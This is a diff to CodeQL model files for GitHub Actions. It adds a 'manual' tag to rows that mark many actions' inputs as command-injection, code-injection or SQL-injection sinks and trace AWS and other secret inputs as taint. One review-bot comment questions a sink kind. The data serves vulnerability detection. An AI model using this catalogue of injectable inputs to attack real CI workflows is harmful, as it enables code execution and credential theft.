+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"]
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint", "manual"]
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "env.AWS_SECRET_ACCESS_KEY", "taint", "manual"]
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "secret.AWS_SECRET_ACCESS_KEY", "taint", "manual"]
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "env.AWS_SESSION_TOKEN", "taint", "manual"]
+ - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "secret.AWS_SESSION_TOKEN", "taint", "manual"]
diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
index 236eade34a64..1563d95b0b14 100644
--- a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
+++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection"]
- - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection"]
+ - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"]
+ - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection", "manual"]
diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml
index c0e11c8201f4..2bb6000355d6 100644
--- a/ql/lib/ext/azure_powershell.model.yml
+++ b/ql/lib/ext/azure_powershell.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["azure/powershell", "*", "input.azPSVersion", "command-injection"]
+ - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"]
diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml
index 2841f406bdaa..b0c3419abe93 100644
--- a/ql/lib/ext/bahmutov_npm-install.model.yml
+++ b/ql/lib/ext/bahmutov_npm-install.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["bahmutov/npm-install", "*", "input.install-command", "command-injection"]
+ - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"]
diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml
index aa060de610d9..cbe593690e44 100644
--- a/ql/lib/ext/blackducksoftware_github-action.model.yml
+++ b/ql/lib/ext/blackducksoftware_github-action.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["blackducksoftware/github-action", "*", "input.args", "command-injection"]
- - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection"]
- - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection"]
+ - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"]
+ - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection", "manual"]
+ - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection", "manual"]
diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml
index 2d8932d87fb5..f29355d48827 100644
--- a/ql/lib/ext/bobheadxi_deployments.model.yml
+++ b/ql/lib/ext/bobheadxi_deployments.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint"]
+ - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"]
diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
index 7d5f699a0e98..8463ed9577b4 100644
--- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
+++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
@@ -3,10 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"]
+ - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection"]
- - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection"]
+ - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"]
+ - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection", "manual"]
diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml
index aeda79986314..f20a877c3d28 100644
--- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml
+++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml
@@ -3,9 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"]
+ - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection"]
+ - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"]
diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml
index 38b18cf6cac8..e0fe96ff9152 100644
--- a/ql/lib/ext/bufbuild_buf-setup-action.model.yml
+++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection"]
- - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection"]
+ - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"]
+ - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection", "manual"]
diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml
index 2e4291eb480c..a7489b686882 100644
--- a/ql/lib/ext/cachix_cachix-action.model.yml
+++ b/ql/lib/ext/cachix_cachix-action.model.yml
@@ -3,10 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"]
+ - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["cachix/cachix-action", "*", "input.installCommand", "command-injection"]
- - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection"]
\ No newline at end of file
+ - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"]
+ - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml
index 3be7669275c6..c0a18c36465f 100644
--- a/ql/lib/ext/changesets_action.model.yml
+++ b/ql/lib/ext/changesets_action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["changesets/action", "*", "input.publish", "command-injection"]
- - ["changesets/action", "*", "input.version", "command-injection"]
+ - ["changesets/action", "*", "input.publish", "command-injection", "manual"]
+ - ["changesets/action", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml
index cb0870b4883f..79ed7a80437c 100644
--- a/ql/lib/ext/cloudflare_wrangler-action.model.yml
+++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection"]
- - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection"]
+ - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"]
+ - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection", "manual"]
diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml
index bfb45dddb668..550b5b854ed7 100644
--- a/ql/lib/ext/coursier_cache-action.model.yml
+++ b/ql/lib/ext/coursier_cache-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint"]
+ - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"]
diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml
index 30e59e91d60c..bbe886112595 100644
--- a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml
+++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection"]
+ - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
index f3b021d226b9..83b3bc3520df 100644
--- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
+++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"]
\ No newline at end of file
+ - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml
index 60e35e66a4de..3b0642fece44 100644
--- a/ql/lib/ext/csexton_release-asset-action.model.yml
+++ b/ql/lib/ext/csexton_release-asset-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint"]
+ - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"]
diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml
index 25df02dacaa6..db55d3c6f3a8 100644
--- a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml
+++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection"]
- - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection"]
- - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection"]
+ - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"]
+ - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection", "manual"]
+ - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection", "manual"]
diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml
index 0aaa1b0722ae..21688675a2ed 100644
--- a/ql/lib/ext/cypress-io_github-action.model.yml
+++ b/ql/lib/ext/cypress-io_github-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["cypress-io/github-action", "*", "env.GH_BRANCH", "PR branch"]
+ - ["cypress-io/github-action", "*", "env.GH_BRANCH", "PR branch", "manual"]
diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml
index 324171f3c4b0..462268636874 100644
--- a/ql/lib/ext/dailydotdev_action-devcard.model.yml
+++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection"]
- - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection"]
+ - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"]
+ - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection", "manual"]
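Review bot: The sink kind `sql-injection` on the `input.commit_branch` and `input.commit_filename` rows of dailydotdev_action-devcard.model.yml stands out in a batch where every other sink is `command-injection` or `code-injection`, and inputs named like git branch and file arguments do not obviously end up in a SQL query. If the kind is deliberate, a short YAML comment above the rows would save the next reader the same double-take, e.g. `# sink kind: sql-injection — <reason>`; if it is a slip, `command-injection` would match how the rest of this batch models branch and filename inputs. I cannot verify the action's implementation from this diff, so treat this as a question rather than a finding.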
diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
index cc5c311eea73..afe3e82ca1f6 100644
--- a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
+++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection"]
+ - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"]
diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml
index f45aae02158d..5b0a9dab38d7 100644
--- a/ql/lib/ext/daspn_private-actions-checkout.model.yml
+++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection"]
- - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection"]
+ - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"]
+ - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection", "manual"]
diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
index 7445d673fcf7..35bbd72f0a4d 100644
--- a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
+++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection"]
- - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection"]
+ - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"]
+ - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection", "manual"]
diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml
index 3bc1dcc4759d..f90eaeb7271b 100644
--- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml
+++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["dawidd6/action-download-artifact", "*", "output.artifacts", "Artifact details"]
+ - ["dawidd6/action-download-artifact", "*", "output.artifacts", "Artifact details", "manual"]
diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml
index 82f491390d2e..1647e5607304 100644
--- a/ql/lib/ext/delaguardo_setup-clojure.model.yml
+++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"]
\ No newline at end of file
+ - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml
index 430a96f6cbef..bbdad8287dd3 100644
--- a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml
+++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml
@@ -3,9 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection"]
- - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection"]
- - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection"]
- - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection"]
- - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection"]
- - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection"]
\ No newline at end of file
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection", "manual"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection", "manual"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection", "manual"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection", "manual"]
+ - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
index 37bcf2cc7815..f3ac66006d99 100644
--- a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
+++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection"]
- - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection"]
- - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection"]
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"]
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection", "manual"]
+ - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection", "manual"]
diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml
index 77eaf3ae10f8..9189245e2289 100644
--- a/ql/lib/ext/docker_build-push-action.model.yml
+++ b/ql/lib/ext/docker_build-push-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["docker/build-push-action", "*", "input.context", "code-injection"]
\ No newline at end of file
+ - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml
index 41a9c337f490..14743f2819ed 100644
--- a/ql/lib/ext/dorny_paths-filter.model.yml
+++ b/ql/lib/ext/dorny_paths-filter.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["dorny/paths-filter", "*", "output.changes", "PR changed files"]
+ - ["dorny/paths-filter", "*", "output.changes", "PR changed files", "manual"]
diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml
index 63cdb2a496b0..bd64fc374236 100644
--- a/ql/lib/ext/endbug_latest-tag.model.yml
+++ b/ql/lib/ext/endbug_latest-tag.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["endbug/latest-tag", "*", "input.ref", "command-injection"]
- - ["endbug/latest-tag", "*", "input.tag-name", "command-injection"]
- - ["endbug/latest-tag", "*", "input.git-directory", "command-injection"]
- - ["endbug/latest-tag", "*", "input.description", "command-injection"]
+ - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"]
+ - ["endbug/latest-tag", "*", "input.tag-name", "command-injection", "manual"]
+ - ["endbug/latest-tag", "*", "input.git-directory", "command-injection", "manual"]
+ - ["endbug/latest-tag", "*", "input.description", "command-injection", "manual"]
diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml
index d0bcbb4da989..9a20279e1103 100644
--- a/ql/lib/ext/expo_expo-github-action.model.yml
+++ b/ql/lib/ext/expo_expo-github-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["expo/expo-github-action", "*", "input.command", "command-injection"]
- - ["expo/expo-github-action", "*", "input.packager", "command-injection"]
+ - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"]
+ - ["expo/expo-github-action", "*", "input.packager", "command-injection", "manual"]
diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
index 6418e71f22a4..8d06bc8a5121 100644
--- a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
+++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection"]
+ - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"]
diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml
index 760b7cd46e72..9d066ac23ecd 100644
--- a/ql/lib/ext/frabert_replace-string-action.model.yml
+++ b/ql/lib/ext/frabert_replace-string-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint"]
- - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint"]
+ - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"]
+ - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint", "manual"]
diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
index b6c75a06e576..ecfce617df45 100644
--- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
+++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "PR body"]
- - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "PR title"]
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "PR body", "manual"]
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "PR title", "manual"]
diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml
index 86705319e23d..563da9d4c0f4 100644
--- a/ql/lib/ext/gabrielbb_xvfb-action.model.yml
+++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection"]
- - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection"]
\ No newline at end of file
+ - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"]
+ - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml
index 61fdcd9254a4..5194ce500fb1 100644
--- a/ql/lib/ext/game-ci_unity-builder.model.yml
+++ b/ql/lib/ext/game-ci_unity-builder.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection"]
- - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection"]
+ - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"]
+ - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection", "manual"]
diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml
index 2d142d98099b..8c2f32627d90 100644
--- a/ql/lib/ext/game-ci_unity-test-runner.model.yml
+++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"]
\ No newline at end of file
+ - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml
index 1727ca60e258..f74ae81a52c8 100644
--- a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml
+++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection"]
\ No newline at end of file
+ - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml
index e6688f3805d0..c7e2cf41b3f6 100644
--- a/ql/lib/ext/getsentry_action-release.model.yml
+++ b/ql/lib/ext/getsentry_action-release.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["getsentry/action-release", "*", "input.version", "output.version", "taint"]
- - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint"]
+ - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"]
+ - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint", "manual"]
diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml
index b214178350c9..781384a2fe19 100644
--- a/ql/lib/ext/github_codeql-action.model.yml
+++ b/ql/lib/ext/github_codeql-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint"]
+ - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"]
diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml
index 146f4a17a559..9036f199f424 100644
--- a/ql/lib/ext/go-semantic-release_action.model.yml
+++ b/ql/lib/ext/go-semantic-release_action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["go-semantic-release/action", "*", "input.bin", "command-injection"]
+ - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"]
diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml
index 8c0f7a5ad614..7eee95dbcce4 100644
--- a/ql/lib/ext/golangci_golangci-lint-action.model.yml
+++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["golangci/golangci-lint-action", "*", "input.version", "command-injection"]
+ - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
index 9c7c03b9f357..4fe9e32ce521 100644
--- a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
+++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection"]
- - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection"]
+ - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"]
+ - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection", "manual"]
